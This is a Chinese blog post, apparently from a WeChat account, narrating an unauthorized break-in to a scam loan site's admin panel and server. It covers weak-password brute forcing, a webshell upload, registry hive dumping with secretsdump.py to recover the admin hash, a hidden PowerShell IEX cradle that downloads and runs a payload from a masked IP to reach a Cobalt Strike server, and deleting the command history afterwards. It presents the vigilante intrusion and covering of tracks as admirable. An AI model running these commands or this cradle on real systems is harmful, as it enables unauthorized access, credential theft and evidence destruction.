记一次虚假贷款网站的渗透之旅

长路漫漫，唯剑作伴。迷迷糊糊的就开始了2020年最后一天的工作，看着朋友圈大佬们都在忙着抽签决定今年带哪个女朋友去度假跨年了，而我只能望着空荡荡的钱包，一时间不知所措，留下的不争气的眼泪，哭着哭着突然觉得女人只会影响我拔剑的速度，一下子就释然了。幻想着怎么找一个富婆，走上人生巅峰。

突然一阵急促的铃声打破了我的幻想，打开一看，我TM直呼好家伙，这不就是瞌睡遇上枕头了嘛！知道我缺钱了，就来给我送钱，这可高兴死我了。

打开一看，最高20万额度，够我找个小姐姐去跨年了。

二话不说直接进入借钱环节，借钱的时候出于习惯的插了些代码以表敬意，反正就是见框就插，但是最后也没插到啥。然后没办法只能认认真真的填写了远在比基尼海滩给海绵宝宝打工的二叔，在青青草原当保安的表哥等一些亲属关系，再把打完怪兽奥特曼给我打款的银行卡号等一些敏感信息填完，怀着激动的心情点击了提交。等待着拿到钱就去约小姐姐。

可是现实并不如意，我都没收到钱，突然就看到欠债十万的账单。

这我就不能忍了，没钱约小姐姐才去借钱的，但是你钱都没给我，反而我让欠债十万，这样我怎么可能会约到小姐姐呢。越想越气。不能就这么算了。必须给它x了。看看他葫芦里卖的什么药。

说着就立马掏出了珍藏的82年御剑，扫了起来，果然家穷人丑，一米四九的我运气还是不错的，没一会就扫到了后台。

突然就感觉很眼熟，这玩意好像在哪见过，但是不管见没见过，先搞再说。一般情况下我这种菜鸡都是弱口令五连，admin、admin123、admin888、123456、111111搞不下直接下一个，因为之前遇到过，弱口令没能搞进去，就只试了前三个口令，发现验证码是重复利用的，就直接祭出了上古神器Burp开始了一波爆破。万万没想到，以弱口令打天下的我，被弱口令反将了一军。

admin/123456

我TM直呼好家伙！（弱口令，永远的神！）

进去后台大概的看了一下，总用户一千六百多，借款总金额度神TM三千多万，不知道是不是真的有人借到钱了。但是个人信息妥妥的被骗子拿到了，姓名、手机、身份证号、身份证正反面手持照片、家庭住址、工作单位、亲属关系、亲属手机号等。（借钱一时爽，还款火葬场）

进都进来了，怎么能忍得住不再继续看看呢?

然后就在系统设置里面看到logo上传点，开整!传马发现传不上去，试了几种上传绕过方式都不行。

默默的留下了属于菜鸡的眼泪，自己还是太菜了，可能就只配玩个弱口令了。

然后就是一顿乱翻瞎搞，看到了允许上传文件类型，不知道当时想的啥就在上传文件类型里面加了个php，然后试着上传。

这一传TMD居然上去了？？？？？？就这样上去了？？？？？？好家伙居然前端验证。

试着访问一下，传是传上去了，但是报错，解析不了，菜刀，蚁剑都连不上。这就让我这种菜鸡很难受了。

望着报错页面默默流泪，想着换个马再传一个试试，但是试了好几次，还是同样的问题，就是连不上。默默的擦了擦属于菜鸡的眼泪，站起身思考着自己为什么这么菜。顺便去接了一杯82年的凉白开。

然后回到座位，习惯性的刷新了一下网页，突然魔幻的一幕发生了，报错居然消失了。立马连蚁剑看看啥情况，居然TM连上了。

望着眼前的shell，我陷入了沉思，这TM不是在刁难我胖虎吗？

像我这种菜鸡实在是没搞懂这是什么操作。

然后就去前端找上传文件类型把php给删除了，看看还能不能正常上传。改完之后继续尝试上传文件，更魔幻的一幕来了，发现这货居然来者不拒，变任意文件上传。我差点当场去世！

既然拿到shell了，那就继续搞搞，看看还有什么好玩的东西。年轻人不能讲武德，直接打开命令窗上去就是一波

systeminfo

继续

netstat -ano

发现开着3389，就不用咱这种菜鸡自己去开端口了，兴奋一波。

然后为了更快速更方便一点，直接一波无脑反弹shell到自己的CS上,发现无法上线。纳尼？

tasklist

查看一下，没有发现powershell进程，但是看到了开着一个某hc保护神的主动防御，这货给我拦了。这TM让我这种菜鸡很为难，这就已经触及到我这种菜鸡的知识盲区了。我还怎么抓密码，怎么日他服务器，还有拿着他这开放的3389有什么用？

心想着不行，不能就这样放弃了。这就好像裤子都脱了，你却给我放个葫芦娃一样，这谁忍的了？得马上去添个大佬，这服务器必须得日下来，说着就去找了小程师傅帮忙，小程师傅一看我这菜鸡，脸上比以往又多了几分沧桑，然后看着我眼角未干的泪水，轻叹了一口气，教导着我多学学，一种方法不行就换另一种，多尝试，总会有成功的那一种！

说着就教我如何利用注册表来离线导出Hash，行云流水般的的输完三行命令，导出了hash。

regsave HKLMSYSTEM       system.hivregsave HKLMSAM          sam.hivregsave hklmsecurity     security.hiv

导出哈希后再使用impacket—secretsdump.py 脚本获取缓存中的明文数据。

pythonsecretsdump.py -sam sam.hiv -security security.hiv -system system.hiv LOCA

成功拿到管理员密文：

2d04a30678f0356f8cee503691a27946

md5解密后：nimade123！！！

这TM就很过分了，居然设置这种密码。好想顺着网线爬过去打死他！

query user

查看一下当前在线用户信息，发现管理员不在线，直接连3389，成功登陆远程桌面。

这还真TM不是什么好人啊，桌面上都是一些我这种菜鸡看不懂的东西，还有什么私人定制，你觉得像我这种纯洁的人会去看嘛！

不过不看归不看，但是该收集的东西还是得收集。（大佬们都懂的/狗头滑稽）

为了更方便更安全的进行后面的一些操作，直接在CMD命令窗口执行powershell脚本，上cs再说。

powershell.exe-nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://xxx.xxx.xxx.xxx:80/a'))"

好家伙，这下某hc保护神也没法子阻挡我前进的步伐了，cs直接上线，然后把cmd窗口执行的powershell命令记录删除一下，直接跑路！

后面在获取到的文件中找到了一些域名和账号密码等信息。

访问之后就非常的懵逼了，为什么一个虚假贷款网站的服务器上会有这种奇奇怪怪的东西。

这样的

这样的

 还有这样的

最后把收集的一些相关证据交给相关的人，至此本次对虚假贷款网站的魔幻渗透之旅结束！其他的慢慢再看！希望各位大佬不要打死我这个菜鸡，毕竟像我这种心思纯洁的小菜鸡能有什么坏心思呢？

本文始发于微信公众号（V安全资讯）：记一次虚假贷款网站的魔幻渗透之旅